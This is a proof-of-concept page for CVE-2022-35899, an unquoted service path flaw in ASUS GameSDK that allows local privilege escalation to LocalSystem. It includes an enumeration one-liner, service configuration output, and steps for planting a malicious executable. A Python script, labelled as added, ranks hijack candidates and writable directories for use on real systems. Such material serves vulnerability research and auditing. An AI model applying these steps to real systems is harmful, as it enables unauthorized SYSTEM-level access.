
CVE-2022-35899 PoC — ASUS GameSDK Code Issue Vulnerability

Source
Associated Vulnerability
Title: ASUS GameSDK Code Issue Vulnerability (CVE-2022-35899)
Description: ASUS GameSDK is a service from ASUS (Taiwan, China). It lets users control the LEDs of Asus Aura-capable devices such as keyboards, mice and motherboards. ASUS GameSDK version 1.0.0.4 has a security vulnerability caused by an unquoted service path in GameSDK.exe.
Description
Unquoted Service Path Asus GameSdk
Readme
# CVE-2022-35899
Unquoted Service Path Asus GameSdk

# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path (Privilege Escalation)
# Date: 07/14/2022
# Exploit Author: Angelo Pio Amirante
# Version: 1.0.0.4
# Tested on: Windows 10
# Patched version: 1.0.5.0

# Step to discover unquoted service paths (auto-start services outside C:\Windows whose path contains no quotes):
```
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
```

# Info on the service:

```
C:\>sc qc "GameSDK Service"

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GameSDK Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : GameSDK Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

```

# Exploit
If an attacker has already gained a foothold on the system and the current user can create files in "C:\" or in "C:\Program Files (x86)\ASUS\", they can drop a malicious "Program.exe" (or "Program Files.exe") in "C:\", or a malicious "GameSDK.exe" in "C:\Program Files (x86)\ASUS\". Because the binary path is unquoted, the Service Control Manager passes the whole string to CreateProcess, which tries each space-delimited prefix with ".exe" appended before reaching the real binary: "C:\Program.exe", then "C:\Program Files.exe", then "C:\Program Files (x86)\ASUS\GameSDK.exe", and only then "C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe". The first file found is executed as LocalSystem in place of the original "GameSDK.exe" the next time the service starts (in practice at boot, since the service is AUTO_START and a standard user normally has no permission to restart it). Note that on a default Windows 10 install a standard user cannot create files in "C:\" or anywhere under "Program Files (x86)", so exploitation requires a weakened ACL on one of those directories; check with `icacls "C:\Program Files (x86)\ASUS"` and `icacls C:\` before relying on it.
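The search order above is easy to get backwards by hand, so here is an added example (not part of the original PoC) that computes it: given a service's PathName as printed by `wmic` or `sc qc`, it reproduces the space-delimited prefix search CreateProcess performs on an unquoted image path, lists the hijack candidates in the order Windows tries them, and derives the directories whose ACLs need checking. The service records other than the GameSDK entry are constructed for illustration; "QuotedSvc" and "NoSpaceSvc" are hypothetical names.

```python
"""Added example: enumerate hijack candidates for unquoted Windows service paths.

Models what CreateProcess does with an unquoted image path that contains
spaces: every space-delimited prefix is tried with ".exe" appended before the
full path is used. Not part of the original PoC.
"""
import ntpath
from typing import Dict, List

# Constructed records modelled on `wmic service get name,pathname,startmode`.
# The GameSDK entry mirrors the BINARY_PATH_NAME shown in the sc qc output;
# the other three are hypothetical and exist only to exercise the filters.
SAMPLE_SERVICES: List[Dict[str, str]] = [
    {"Name": "EventLog",
     "PathName": r"C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted",
     "StartMode": "Auto"},
    {"Name": "GameSDK Service",
     "PathName": r"C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe",
     "StartMode": "Auto"},
    {"Name": "QuotedSvc",   # hypothetical: correctly quoted, so safe
     "PathName": r'"C:\Program Files\Vendor\svc.exe" -run',
     "StartMode": "Auto"},
    {"Name": "NoSpaceSvc",  # hypothetical: no spaces, nothing to hijack
     "PathName": r"C:\Tools\agent.exe",
     "StartMode": "Manual"},
]


def image_path_tokens(pathname: str) -> List[str]:
    """Space-delimited tokens that make up an unquoted image path.

    Returns [] when the path is quoted or has no spaces (nothing to hijack).
    Tokens are taken up to and including the first one ending in ".exe";
    anything after that is treated as command-line arguments.
    """
    pathname = pathname.strip()
    if not pathname or pathname.startswith('"'):
        return []
    image: List[str] = []
    for tok in pathname.split(" "):
        image.append(tok)
        if tok.lower().endswith(".exe"):
            break
    return image if len(image) > 1 else []


def hijack_candidates(pathname: str) -> List[str]:
    """Files Windows tries before the real binary, in search order."""
    tokens = image_path_tokens(pathname)
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]


def directories_to_check(pathname: str) -> List[str]:
    """Distinct parent directories of the candidates, in search order.

    If a low-privileged user can create files in any of these, the service
    is hijackable; verify with `icacls <dir>` on the target.
    """
    seen: List[str] = []
    for cand in hijack_candidates(pathname):
        parent = ntpath.dirname(cand)
        if parent not in seen:
            seen.append(parent)
    return seen


def find_unquoted_services(records: List[Dict[str, str]],
                           auto_only: bool = True) -> List[str]:
    """Mirror the wmic | findstr one-liner from the PoC: auto-start services
    outside C:\\Windows\\ whose unquoted image path contains spaces."""
    hits: List[str] = []
    for rec in records:
        path = rec["PathName"]
        if auto_only and rec["StartMode"].lower() != "auto":
            continue
        if path.lower().startswith("c:\\windows\\"):
            continue
        if hijack_candidates(path):
            hits.append(rec["Name"])
    return hits


if __name__ == "__main__":
    for name in find_unquoted_services(SAMPLE_SERVICES):
        path = next(r["PathName"] for r in SAMPLE_SERVICES if r["Name"] == name)
        print(f"[{name}] {path}")
        for cand in hijack_candidates(path):
            print("   would try:", cand)
        print("   check ACLs on:", directories_to_check(path))
```

Run against real output by replacing SAMPLE_SERVICES with the parsed result of `wmic service get name,pathname,startmode /format:csv` (or `Get-CimInstance Win32_Service` in PowerShell); the candidate list is what you then feed to `icacls` to find a directory where the current user has write or create-file rights.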

# Impact
A local attacker who can write to one of the searched directories can elevate their privileges to LocalSystem, the account the service runs as.

# POC Video
https://youtu.be/u_8JMIgn-5g



File Snapshot

[4.0K] /data/pocs/c7c31fc8d764cb4f839a1e0a4b36bd239acd0d81 └── [1.5K] README.md 0 directories, 1 file